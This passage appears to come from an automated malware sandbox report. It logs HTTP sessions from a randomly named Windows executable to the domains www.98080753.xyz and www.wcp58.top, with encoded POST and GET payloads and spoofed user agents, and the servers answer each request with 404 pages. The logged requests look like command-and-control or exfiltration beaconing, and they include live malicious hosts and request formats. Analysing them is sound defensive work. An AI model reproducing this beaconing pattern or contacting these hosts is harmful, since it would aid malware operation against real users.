                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                        Oct 23, 2024 07:03:29.881217003 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        7192.168.2.759654161.97.168.24580484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:31.605112076 CEST1778OUTPOST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 41 65 55 4f 54 33 31 56 72 70 62 38 4f 72 55 69 4d 52 69 38 6a 43 79 4b 53 66 30 6c 6e 30 43 55 78 70 44 36 67 6f 43 65 46 4f 4d 4a 6e 44 42 44 42 2b 30 75 56 59 77 70 6f 4c 59 6c 43 77 43 33 51 58 65 73 2b 35 4d 46 65 5a 7a 4a 64 54 36 61 6f 6e 64 35 41 49 45 77 47 57 39 6a 2b 77 72 76 57 42 34 36 44 47 62 69 2b 36 31 31 4a 6e 46 73 49 62 37 78 61 76 33 4a 6c 38 67 5a 31 2f 55 2b 56 70 50 39 7a 52 59 6d 54 7a 44 38 66 2f 49 7a 58 30 43 6e 44 59 52 4f 4b 66 45 41 54 65 63 69 42 6d 69 72 46 75 69 54 51 67 66 44 75 73 63 43 55 50 64 77 50 2f 2b 43 6f 61 7a 41 56 52 68 79 71 4f 78 4d 45 4a 79 39 38 32 59 4b 49 2b 6d 50 73 4f 42 75 75 31 4d 2f 62 4d 6d 6f 63 4a 53 44 2f 2b 42 69 32 47 71 7a 39 75 53 41 37 47 36 55 64 78 49 34 4e 4a 38 64 37 4a 33 76 6d 6e 53 58 58 6d 4f 41 74 2b 54 38 41 4f 47 6d 44 49 34 55 56 39 46 56 75 55 45 4e 64 36 55 30 58 6b 58 41 50 65 75 57 44 38 63 50 64 35 7a 61 65 6f 44 52 65 75 42 2f 6f 2b 43 35 51 71 4d 42 52 4f 4b [TRUNCATED]
                                                                                                                                        Data Ascii: fvM8Gh=mNRv7J5sXV+jAeUOT31Vrpb8OrUiMRi8jCyKSf0ln0CUxpD6goCeFOMJnDBDB+0uVYwpoLYlCwC3QXes+5MFeZzJdT6aond5AIEwGW9j+wrvWB46DGbi+611JnFsIb7xav3Jl8gZ1/U+VpP9zRYmTzD8f/IzX0CnDYROKfEATeciBmirFuiTQgfDuscCUPdwP/+CoazAVRhyqOxMEJy982YKI+mPsOBuu1M/bMmocJSD/+Bi2Gqz9uSA7G6UdxI4NJ8d7J3vmnSXXmOAt+T8AOGmDI4UV9FVuUENd6U0XkXAPeuWD8cPd5zaeoDReuB/o+C5QqMBROKO4XA3xwh2xsfJc7VKOdqsOZ33Wk9rrwjUTgZ5Dke0Uq5ARX6uNp+gDvwH+iamE36toyyn5Bc2cQQMturcw5W62OCJ6qZU1n44SntOf0JgLtjSm4IxZndpgGgeX91FDg6Fp6irvfpxw9QOoGYT4CDGgj976dxqmCVTtttnDwyXGnDEIjxPc/kncGoe4XLqV6VkR+5M30xQuimzX4PJLrkNVwTfy4GR8lYOi3rKwW2v+BUF7/w37lk2+KibWjoJLcAdyBaSrTJ7ZdM8Ubxu9bUB5J6YtlEm12ybq+SoQckwJ29Tb4CQDj5MZeM6EF7BO1n4GqSTh9Ru3KFlKQSkDD80R2wF0anhGbfGcSh2BKiMzOtACciDWNPyzrUaxS2aU2U+anrlLQ8ijL1LH+cF04boTGB6P64xyuWTEFIKUdg6hzAvayKduhmA1+gcsnnJGBh1f23ATQ4xPXF1Z23s3K7pmwZi0TUDIGTDrZSO2OYVQNkngkNVOPTdYmcwoK+9IMweBUfaIUNBcnHWH6VKH1t7gVE7okHSfGd51G7c22XYVd4ObrVd9fQhkcdy8Kejp7mqZy54Jr6eXw2zr0Gd/04YojcEgmHz2IhjHRaEnj4cxWn5yh3Ys9fEmwv5Ej5uJ+TsNyw2ZD++V1Ub24Pd5MvzwWAuIyAui6caz [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:03:32.440136909 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:32 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                        Oct 23, 2024 07:03:32.440164089 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        8192.168.2.759655161.97.168.24580484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:34.163798094 CEST485OUTGET /eth5/?DfDx=AFrxfzcH-Ld&fvM8Gh=rP5P45xZZ1/7FcUVVUJeza+IVqMoIQCjuRWKRMBKl26wwcm/v5roWtgm33BJF8xpb4kfp7QdHQmzbzTt1acSQ4mCbwyezktofLwADktY5A3eXEgsMSOExa06ByFNIL6LLeLE9sVmxY4B HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Oct 23, 2024 07:03:35.010540962 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:34 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 2966
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: "66cd104a-b96"
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:03:35.010569096 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                        Oct 23, 2024 07:03:35.010587931 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        9192.168.2.759656154.23.184.24080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:40.743078947 CEST736OUTPOST /u071/ HTTP/1.1
                                                                                                                                        Host: www.wcp58.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.wcp58.top
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.wcp58.top/u071/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 57 44 68 38 2f 4f 42 51 71 79 2b 4b 53 42 37 76 49 77 34 57 70 62 4d 42 63 46 43 70 62 50 53 6d 49 73 32 54 6b 42 6f 56 63 51 72 68 73 4a 62 61 46 33 59 47 34 75 49 4e 61 35 34 48 6e 39 41 33 58 4e 59 59 58 6c 5a 71 51 57 73 6a 38 58 69 63 57 46 2f 38 41 70 37 56 67 4c 52 2b 53 74 59 4a 50 74 68 64 4d 4e 66 31 47 63 6e 57 4d 43 53 53 79 36 30 79 35 34 62 54 4d 6c 75 31 38 39 6f 30 71 65 55 77 70 38 54 6b 50 38 39 67 5a 32 66 5a 31 2f 33 38 6e 35 68 34 64 57 6e 33 68 6c 79 77 4a 67 35 68 64 36 38 30 44 4e 79 2b 61 64 6a 62 6f 30 35 55 49 63 47 41 48 63 38 53 47 78 42 31 66 79 75 71 48 73 5a 61 6b 57 7a 6c 6d 62 61 79 41 77 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=WDh8/OBQqy+KSB7vIw4WpbMBcFCpbPSmIs2TkBoVcQrhsJbaF3YG4uINa54Hn9A3XNYYXlZqQWsj8XicWF/8Ap7VgLR+StYJPthdMNf1GcnWMCSSy60y54bTMlu189o0qeUwp8TkP89gZ2fZ1/38n5h4dWn3hlywJg5hd680DNy+adjbo05UIcGAHc8SGxB1fyuqHsZakWzlmbayAw==
                                                                                                                                        Oct 23, 2024 07:03:41.684956074 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:41 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 148
                                                                                                                                        Connection: close
                                                                                                                                        ETag: "66a72cd5-94"
                                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        10192.168.2.759657154.23.184.24080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:43.288655996 CEST756OUTPOST /u071/ HTTP/1.1
                                                                                                                                        Host: www.wcp58.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.wcp58.top
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.wcp58.top/u071/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 57 44 68 38 2f 4f 42 51 71 79 2b 4b 64 42 72 76 4e 58 73 57 6f 37 4d 43 54 6c 43 70 43 66 53 69 49 73 36 54 6b 41 73 46 4a 32 54 68 73 74 66 61 45 7a 4d 47 37 75 49 4e 43 4a 34 47 36 4e 41 43 58 4e 45 51 58 6e 4e 71 51 56 51 6a 38 56 36 63 52 79 72 2f 42 35 37 58 31 62 52 77 4d 64 59 4a 50 74 68 64 4d 4e 4c 62 47 63 2f 57 4d 33 61 53 39 37 30 31 36 34 62 55 61 56 75 31 32 64 6f 77 71 65 55 43 70 39 50 65 50 2b 31 67 5a 30 48 5a 31 74 66 7a 74 35 68 2b 5a 57 6d 76 6f 77 72 62 48 42 42 65 51 62 67 4d 44 73 43 41 57 4c 2b 35 79 57 31 34 57 4e 2b 37 44 65 59 6b 52 58 63 41 64 7a 71 79 4b 4f 74 37 37 68 57 50 72 4a 37 32 57 50 46 43 6e 55 34 70 38 4a 58 6b 75 7a 79 32 53 73 74 63 71 49 6b 3d
                                                                                                                                        Data Ascii: fvM8Gh=WDh8/OBQqy+KdBrvNXsWo7MCTlCpCfSiIs6TkAsFJ2ThstfaEzMG7uINCJ4G6NACXNEQXnNqQVQj8V6cRyr/B57X1bRwMdYJPthdMNLbGc/WM3aS970164bUaVu12dowqeUCp9PeP+1gZ0HZ1tfzt5h+ZWmvowrbHBBeQbgMDsCAWL+5yW14WN+7DeYkRXcAdzqyKOt77hWPrJ72WPFCnU4p8JXkuzy2SstcqIk=
                                                                                                                                        Oct 23, 2024 07:03:44.790514946 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:44 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 148
                                                                                                                                        Connection: close
                                                                                                                                        ETag: "66a72cd5-94"
                                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        11192.168.2.759658154.23.184.24080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:45.835012913 CEST1769OUTPOST /u071/ HTTP/1.1
                                                                                                                                        Host: www.wcp58.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.wcp58.top
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.wcp58.top/u071/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 57 44 68 38 2f 4f 42 51 71 79 2b 4b 64 42 72 76 4e 58 73 57 6f 37 4d 43 54 6c 43 70 43 66 53 69 49 73 36 54 6b 41 73 46 4a 32 62 68 72 65 48 61 46 55 77 47 36 75 49 4e 63 35 34 62 36 4e 41 66 58 4e 4d 55 58 6e 42 63 51 51 55 6a 6d 77 75 63 55 47 48 2f 4b 35 37 58 71 72 52 78 53 74 59 41 50 70 46 42 4d 4e 62 62 47 63 2f 57 4d 32 71 53 30 4b 30 31 38 34 62 54 4d 6c 75 68 38 39 6f 59 71 65 4d 6f 70 39 4b 38 4f 4b 42 67 59 55 58 5a 33 65 33 7a 77 70 68 38 65 57 6d 38 6f 77 76 45 48 42 64 34 51 62 55 69 44 76 53 41 54 71 2f 2b 33 47 68 59 4c 61 57 31 44 4f 51 56 59 30 59 44 59 79 36 37 4f 39 64 33 31 54 4c 36 6d 4b 76 2f 63 34 49 52 33 53 77 5a 30 36 48 6a 6d 30 6a 71 4a 70 39 61 7a 50 46 4b 6b 63 4a 65 64 52 6f 7a 6f 61 44 64 50 47 4e 4e 72 50 5a 55 5a 42 55 4a 30 61 6d 2b 46 44 6c 45 41 4b 42 48 68 4f 53 64 4e 7a 52 59 75 2f 53 78 6a 67 72 67 44 52 44 37 59 6e 37 79 58 2b 50 58 4a 72 2b 6f 51 72 52 58 76 76 36 6f 75 37 65 37 39 30 51 4a 4c 55 74 30 35 57 39 6d 5a 76 70 6d 56 52 58 [TRUNCATED]
                                                                                                                                        Data Ascii: fvM8Gh=WDh8/OBQqy+KdBrvNXsWo7MCTlCpCfSiIs6TkAsFJ2bhreHaFUwG6uINc54b6NAfXNMUXnBcQQUjmwucUGH/K57XqrRxStYAPpFBMNbbGc/WM2qS0K0184bTMluh89oYqeMop9K8OKBgYUXZ3e3zwph8eWm8owvEHBd4QbUiDvSATq/+3GhYLaW1DOQVY0YDYy67O9d31TL6mKv/c4IR3SwZ06Hjm0jqJp9azPFKkcJedRozoaDdPGNNrPZUZBUJ0am+FDlEAKBHhOSdNzRYu/SxjgrgDRD7Yn7yX+PXJr+oQrRXvv6ou7e790QJLUt05W9mZvpmVRX6/T8ZkLX+g2CcHwSALv/NyC9+ualZzB9pLAnyvsHJLBuS1nUNx1XndlmuGG3UA0JQKo+ai4tPvjDh4m0ibRdd+ONaz27XaGCRGfpRV2T4H8P76enr8g9zJcawoPxuSfHFEe9FMAhCs16V4ZWdd80Zo/D/BnOw87alPbCoHuAnbrbI3UIaUsmp0sKn6O8q0YNh3ZpRtY4rDkgn4oY3UgnVZtHgbJPGzdbVB919Uf/Wk44sDA7BJYJ2vng2o5bhInubTHZ4zffGBfj374LqeH3ISQfVvUs98y1Jw+bF6A1NXLghJ3c8PdzePJiJLfvolarSFXMcAa1gPrjJszF7ma1iKSGR7SnrHjxkBNOCaokkXC4D4ZkR5V5hLpcj8Ug4ceJrVKsE67PUrtCpzx3G4EK+0XieoZGOdjCfxBSIe+Bq3rnebe3TfEGNZC6IVaTfBouPteBIFBdRWOxHH/KYApcE/InhtEukyfp3K168dVzwYAtNaapGckt5sUkOBYCvAVUBHMRsohu010Yw9mo8xwl7uEVKgG1GTYDYipl4enWdxU5FCpW9VxlyqkrAtDQ/LWgSqIpk5Cu3VqVIUx/IxQbubbKifRiYVZIqy5qnoFFjaeqw74LnsBFLhYgMw6IFCzYwNI+4iFYURtA01lBDbRW0M+6NuFvAQDOJZ [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:03:47.346669912 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:46 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 148
                                                                                                                                        Connection: close
                                                                                                                                        ETag: "66a72cd5-94"
                                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        12192.168.2.759659154.23.184.24080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:48.380656958 CEST482OUTGET /u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.wcp58.top
